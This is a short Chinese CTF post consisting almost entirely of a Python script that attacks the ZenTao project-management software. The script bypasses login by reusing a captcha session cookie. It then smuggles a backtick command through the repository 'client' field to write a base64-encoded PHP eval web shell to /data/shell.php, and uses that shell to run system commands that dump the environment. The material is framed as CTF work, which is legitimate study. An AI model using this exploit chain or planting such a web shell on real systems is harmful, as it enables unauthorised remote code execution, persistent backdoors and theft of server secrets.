[CTF] 蝉道Zentao RCE脚本

编写的是非伪静态版本
伪静态替换下路径即可
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76


import requests
import random
import re

# Author S1EEPS0RT

header={
    "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"
}

def getSessionId(url,session):
    target=url+"/index.php?m=misc&f=captcha&sessionVar=user"
    r=session.get(target,headers=header)
    try:
        zentaosid=r.cookies.get_dict()['zentaosid']
        print(zentaosid)
    except:
        print("[x]","无法获取Cookie")

    header["Cookie"]="zentaosid="+zentaosid
    resp=session.get(url+"/index.php?m=my&f=index",headers=header)
    if "index.php?m=user&f=login" not in resp.text:
        print("[*]","绕过登陆验证")
        return zentaosid
    else:
        print("[x]","无法绕过验证")

def createRepo(url,sid):
    target=url+"/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss"
    header["Cookie"]="zentaosid="+sid
    header["Referer"]=url+"/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss"
    header["Origin"]=url
    header["Accept"]="application/json, text/javascript, */*; q=0.01"
    header["X-Requested-With"]="XMLHttpRequest"
    payload = "product%5B%5D=1&SCM=Gitlab&serviceProject=ptest"+str(random.randint(100, 90000))+"&name=pp1"+str(random.randint(100, 90000))+"&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=63e4a18218a68"
    r=requests.post(target,headers=header,data=payload)
    print("[*]",r.text)
    match = re.search(r'repoID=(\d+)', r.text)
    if match:
        return match.group(1)
    else:
        print("[x]","创建仓库失败")
        exit()

def editRepo(url,sid,repoid):
    target=url+"/index.php?m=repo&f=edit&repoID="+repoid+"&objectID=0&tid=91c0hwo4"
    header["Cookie"]="zentaosid="+sid
    header["Referer"]=url+"/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss"
    header["Origin"]=url
    header["Accept"]="application/json, text/javascript, */*; q=0.01"
    payload = "product%255B%255D=1&SCM=Subversion&serviceProject=0&name=O0O&path=http://10.0.0.1&encoding=utf-8&client=%60echo%20PD9waHAgZXZhbCgkX1BPU1RbImEiXSkgPz4=%7Cbase64%20-d%20%3E%20../../www/data/shell.php%60&account=&password=&encrypt=base64&desc=&uid=66b9b73fa898b"
    r=requests.post(target,headers=header,data=payload)
    print("[*]",r.text)

def execCommand(url,command):
    headers={
        "Content-Type":"application/x-www-form-urlencoded"
    }
    target=url+"/data/shell.php"
    payload = "a="+command
    r=requests.post(target,data=payload,headers=headers)
    print("[*]",r.text)

if __name__ == '__main__':
    base_url = "http://172.21.11.5/zentaopms/www"
    session=requests.Session()
    print("<-- S1EEPS0RT -->")
    sid = getSessionId(base_url,session)
    print("[*]","尝试创建Repo")
    repoID = createRepo(base_url,sid)
    print("[*]","RepoID:",repoID)
    print("[*]","尝试写入WebShell")
    editRepo(base_url,sid,repoID)
    print("[*]","通过 /data/shell.php 执行命令")
    execCommand(base_url,"system('id;date;env')%3B")